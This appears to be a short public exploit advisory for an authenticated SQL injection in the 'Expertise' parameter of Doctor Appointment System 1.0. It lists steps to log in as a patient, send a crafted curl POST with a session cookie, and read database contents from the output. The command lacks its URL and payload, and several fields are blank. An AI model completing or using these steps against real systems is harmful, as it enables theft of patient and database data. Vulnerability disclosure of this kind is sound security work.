Doctor Appointment System 1.0 SQL Injection

Doctor Appointment System version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | 9400a91d402c35bb9d7ef9e6f8fa769f

# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection
# Date: 2021-02-09
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage:
# Software Link:
# Version: V1.0

Vulnerable File:

Vulnerable Issue:
Expertise parameter has no input validation

1] Login as a normal patient user
2] Insert cookie after successful login in the below command:
curl -i -s -o tmp -k -X $'POST' \
-H $'Host:' -H $'Content-Type:
application/x-www-form-urlencoded' -H $'Content-Length: 288' -H
$'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H
$'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
3] Check the tmp file for sensitive information from the database.

Kindly let us know if any other information is required.

Related Posts